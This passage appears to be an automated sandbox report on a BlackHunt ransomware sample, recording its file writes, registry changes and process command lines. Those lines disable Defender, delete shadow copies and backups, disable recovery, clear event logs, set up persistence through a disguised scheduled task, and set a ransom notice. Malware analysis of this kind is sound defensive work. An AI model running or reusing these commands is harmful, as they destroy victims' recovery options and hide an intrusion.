| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sl-si\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\zh-tw\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ar_get.svg | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\dotnet\host\fxr\7.0.16\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\#BlackHunt_ReadMe.hta | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\currency.data | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\fy\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fi-fi\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ro-ro\#BlackHunt_ReadMe.hta | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\vlc.mo | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\css\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\cs-cz\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-high-contrast.css | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\example_icons.png | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\root\#BlackHunt_ReadMe.hta | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fr-ma\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\mshta.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\System32\vds.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\System32\vds.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\System32\vds.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\System32\vds.exe | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings | C:\Windows\System32\cmd.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Hunt2 | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\.Hunt2 | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ | C:\Windows\system32\reg.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe
"C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe" /F
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
C:\Windows\system32\schtasks.exe
SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe" /F
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled No
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
C:\Windows\system32\fsutil.exe
fsutil.exe usn deletejournal /D C:
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
C:\Windows\system32\wbadmin.exe
wbadmin.exe delete catalog -quiet
C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\
C:\Windows\system32\fsutil.exe
fsutil usn deletejournal /D F:\
C:\Windows\system32\fsutil.exe
fsutil usn deletejournal /D C:\
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup
C:\Windows\system32\fsutil.exe
fsutil usn deletejournal /D M:\
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl Setup
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl System
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected] ,TELEGRAM:@GotchaDec] " /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl Application
C:\Windows\System32\cmd.exe
